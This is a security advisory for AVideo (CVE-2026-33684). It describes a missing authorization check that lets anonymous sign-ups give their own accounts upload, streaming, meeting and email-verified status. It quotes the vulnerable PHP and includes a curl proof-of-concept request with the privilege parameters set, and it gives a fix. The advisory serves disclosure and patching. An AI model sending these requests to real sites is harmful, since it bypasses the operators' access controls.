GHSA-8J8M-P79X-G4JM
Vulnerability from github – Published: 2026-06-22 17:25 – Updated: 2026-06-22 17:25Summary
The set_api_signUp method in the API plugin accepts emailVerified, canUpload, canStream, and canCreateMeet parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. Any anonymous user who can solve a CAPTCHA can self-grant elevated permissions during account registration.
Details
The authentication check in set_api_signUp (plugin/API/API.php:4222) allows either a valid APISecret (admin-level credential) or a solved CAPTCHA (anonymous access):
// plugin/API/API.php:4222-4232
if ($obj->APISecret !== @$_REQUEST['APISecret']) {
if(empty($_REQUEST['captcha'])){
return new ApiObject("Captcha is required");
}
require_once $global['systemRootPath'] . 'objects/captcha.php';
$valid = Captcha::validation($_REQUEST['captcha']);
if(!$valid){
return new ApiObject("Captcha is wrong, reload it and try again");
}
}
After this check, both code paths (APISecret and CAPTCHA) reach the privilege parameter handling unconditionally:
// plugin/API/API.php:4238-4249
if (isset($_REQUEST['emailVerified'])) {
$global['emailVerified'] = intval($_REQUEST['emailVerified']);
}
if (isset($_REQUEST['canCreateMeet'])) {
$global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);
}
if (isset($_REQUEST['canStream'])) {
$global['canStream'] = intval($_REQUEST['canStream']);
}
if (isset($_REQUEST['canUpload'])) {
$global['canUpload'] = intval($_REQUEST['canUpload']);
}
These $global values are then consumed by User::save() (objects/user.php:829-840), which overrides the user object's permission fields:
// objects/user.php:829-840
if (isset($global['emailVerified'])) {
$this->emailVerified = $global['emailVerified'];
}
if (isset($global['canCreateMeet'])) {
$this->canCreateMeet = $global['canCreateMeet'];
}
if (isset($global['canStream'])) {
$this->canStream = $global['canStream'];
}
if (isset($global['canUpload'])) {
$this->canUpload = $global['canUpload'];
}
Note that even though userCreate.json.php:90 sets canUpload from the site's default configuration, User::save() subsequently overrides it with the attacker-controlled $global value.
The codebase already uses self::isAPISecretValid() to guard admin-only operations in other API methods (e.g., lines 294, 991, 1664, 2150), but this check is missing for the privilege parameters in set_api_signUp.
PoC
# Step 1: Get a CAPTCHA token
# (Navigate to the signup page in a browser, solve the CAPTCHA, capture the token)
# Step 2: Register with elevated privileges
curl -X POST 'https://target/plugin/API/set.json.php' \
-d 'APIName=signUp' \
-d 'user=attacker' \
-d 'pass=Password123!' \
-d 'email=attacker@example.com' \
-d 'name=Attacker' \
-d 'captcha=VALID_CAPTCHA_TOKEN' \
-d 'emailVerified=1' \
-d 'canUpload=1' \
-d 'canStream=1' \
-d 'canCreateMeet=1'
# Expected: Account created with default (restricted) permissions
# Actual: Account created with upload, stream, and meet permissions enabled,
# plus email marked as verified
# Step 3: Verify elevated permissions by logging in and checking profile
curl -X POST 'https://target/plugin/API/set.json.php' \
-d 'APIName=signIn' \
-d 'user=attacker' \
-d 'pass=Password123!'
# Response will show canUpload=1, canStream=1, canCreateMeet=1, emailVerified=1
Impact
- Email verification bypass: Attackers can mark their accounts as email-verified without owning the email address, bypassing any email-gated functionality
- Unauthorized upload access: Self-granted upload permissions allow uploading potentially malicious video content to the platform
- Unauthorized streaming access: Self-granted streaming permissions allow unauthorized live streaming
- Unauthorized meeting creation: Self-granted meet permissions allow creating meetings on the platform
- Policy bypass: Platform administrators who intentionally restrict these permissions for new users (e.g., requiring manual approval before granting upload rights) have their access controls circumvented
Recommended Fix
Wrap the privilege parameter handling in an isAPISecretValid() check so that only admin-authenticated requests can set these values:
// plugin/API/API.php — replace lines 4238-4249 with:
if (self::isAPISecretValid()) {
if (isset($_REQUEST['emailVerified'])) {
$global['emailVerified'] = intval($_REQUEST['emailVerified']);
}
if (isset($_REQUEST['canCreateMeet'])) {
$global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);
}
if (isset($_REQUEST['canStream'])) {
$global['canStream'] = intval($_REQUEST['canStream']);
}
if (isset($_REQUEST['canUpload'])) {
$global['canUpload'] = intval($_REQUEST['canUpload']);
}
}
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "29.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33684"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T17:25:03Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `set_api_signUp` method in the API plugin accepts `emailVerified`, `canUpload`, `canStream`, and `canCreateMeet` parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. Any anonymous user who can solve a CAPTCHA can self-grant elevated permissions during account registration.\n\n## Details\n\nThe authentication check in `set_api_signUp` (`plugin/API/API.php:4222`) allows either a valid APISecret (admin-level credential) or a solved CAPTCHA (anonymous access):\n\n```php\n// plugin/API/API.php:4222-4232\nif ($obj-\u003eAPISecret !== @$_REQUEST[\u0027APISecret\u0027]) {\n if(empty($_REQUEST[\u0027captcha\u0027])){\n return new ApiObject(\"Captcha is required\");\n }\n require_once $global[\u0027systemRootPath\u0027] . \u0027objects/captcha.php\u0027;\n $valid = Captcha::validation($_REQUEST[\u0027captcha\u0027]);\n if(!$valid){\n return new ApiObject(\"Captcha is wrong, reload it and try again\");\n }\n}\n```\n\nAfter this check, both code paths (APISecret and CAPTCHA) reach the privilege parameter handling unconditionally:\n\n```php\n// plugin/API/API.php:4238-4249\nif (isset($_REQUEST[\u0027emailVerified\u0027])) {\n $global[\u0027emailVerified\u0027] = intval($_REQUEST[\u0027emailVerified\u0027]);\n}\nif (isset($_REQUEST[\u0027canCreateMeet\u0027])) {\n $global[\u0027canCreateMeet\u0027] = intval($_REQUEST[\u0027canCreateMeet\u0027]);\n}\nif (isset($_REQUEST[\u0027canStream\u0027])) {\n $global[\u0027canStream\u0027] = intval($_REQUEST[\u0027canStream\u0027]);\n}\nif (isset($_REQUEST[\u0027canUpload\u0027])) {\n $global[\u0027canUpload\u0027] = intval($_REQUEST[\u0027canUpload\u0027]);\n}\n```\n\nThese `$global` values are then consumed by `User::save()` (`objects/user.php:829-840`), which overrides the user object\u0027s permission fields:\n\n```php\n// objects/user.php:829-840\nif (isset($global[\u0027emailVerified\u0027])) {\n $this-\u003eemailVerified = $global[\u0027emailVerified\u0027];\n}\nif (isset($global[\u0027canCreateMeet\u0027])) {\n $this-\u003ecanCreateMeet = $global[\u0027canCreateMeet\u0027];\n}\nif (isset($global[\u0027canStream\u0027])) {\n $this-\u003ecanStream = $global[\u0027canStream\u0027];\n}\nif (isset($global[\u0027canUpload\u0027])) {\n $this-\u003ecanUpload = $global[\u0027canUpload\u0027];\n}\n```\n\nNote that even though `userCreate.json.php:90` sets `canUpload` from the site\u0027s default configuration, `User::save()` subsequently overrides it with the attacker-controlled `$global` value.\n\nThe codebase already uses `self::isAPISecretValid()` to guard admin-only operations in other API methods (e.g., lines 294, 991, 1664, 2150), but this check is missing for the privilege parameters in `set_api_signUp`.\n\n## PoC\n\n```bash\n# Step 1: Get a CAPTCHA token\n# (Navigate to the signup page in a browser, solve the CAPTCHA, capture the token)\n\n# Step 2: Register with elevated privileges\ncurl -X POST \u0027https://target/plugin/API/set.json.php\u0027 \\\n -d \u0027APIName=signUp\u0027 \\\n -d \u0027user=attacker\u0027 \\\n -d \u0027pass=Password123!\u0027 \\\n -d \u0027email=attacker@example.com\u0027 \\\n -d \u0027name=Attacker\u0027 \\\n -d \u0027captcha=VALID_CAPTCHA_TOKEN\u0027 \\\n -d \u0027emailVerified=1\u0027 \\\n -d \u0027canUpload=1\u0027 \\\n -d \u0027canStream=1\u0027 \\\n -d \u0027canCreateMeet=1\u0027\n\n# Expected: Account created with default (restricted) permissions\n# Actual: Account created with upload, stream, and meet permissions enabled,\n# plus email marked as verified\n\n# Step 3: Verify elevated permissions by logging in and checking profile\ncurl -X POST \u0027https://target/plugin/API/set.json.php\u0027 \\\n -d \u0027APIName=signIn\u0027 \\\n -d \u0027user=attacker\u0027 \\\n -d \u0027pass=Password123!\u0027\n# Response will show canUpload=1, canStream=1, canCreateMeet=1, emailVerified=1\n```\n\n## Impact\n\n- **Email verification bypass:** Attackers can mark their accounts as email-verified without owning the email address, bypassing any email-gated functionality\n- **Unauthorized upload access:** Self-granted upload permissions allow uploading potentially malicious video content to the platform\n- **Unauthorized streaming access:** Self-granted streaming permissions allow unauthorized live streaming\n- **Unauthorized meeting creation:** Self-granted meet permissions allow creating meetings on the platform\n- **Policy bypass:** Platform administrators who intentionally restrict these permissions for new users (e.g., requiring manual approval before granting upload rights) have their access controls circumvented\n\n## Recommended Fix\n\nWrap the privilege parameter handling in an `isAPISecretValid()` check so that only admin-authenticated requests can set these values:\n\n```php\n// plugin/API/API.php \u2014 replace lines 4238-4249 with:\nif (self::isAPISecretValid()) {\n if (isset($_REQUEST[\u0027emailVerified\u0027])) {\n $global[\u0027emailVerified\u0027] = intval($_REQUEST[\u0027emailVerified\u0027]);\n }\n if (isset($_REQUEST[\u0027canCreateMeet\u0027])) {\n $global[\u0027canCreateMeet\u0027] = intval($_REQUEST[\u0027canCreateMeet\u0027]);\n }\n if (isset($_REQUEST[\u0027canStream\u0027])) {\n $global[\u0027canStream\u0027] = intval($_REQUEST[\u0027canStream\u0027]);\n }\n if (isset($_REQUEST[\u0027canUpload\u0027])) {\n $global[\u0027canUpload\u0027] = intval($_REQUEST[\u0027canUpload\u0027]);\n }\n}\n```",
"id": "GHSA-8j8m-p79x-g4jm",
"modified": "2026-06-22T17:25:03Z",
"published": "2026-06-22T17:25:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8j8m-p79x-g4jm"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/061f242cba0e068cc1b461705fe839274b5038ff"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "AVideo\u0027s Privilege Escalation via Unguarded Permission Parameters in signUp API Allows Self-Granting Upload/Stream/Meet Permissions"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.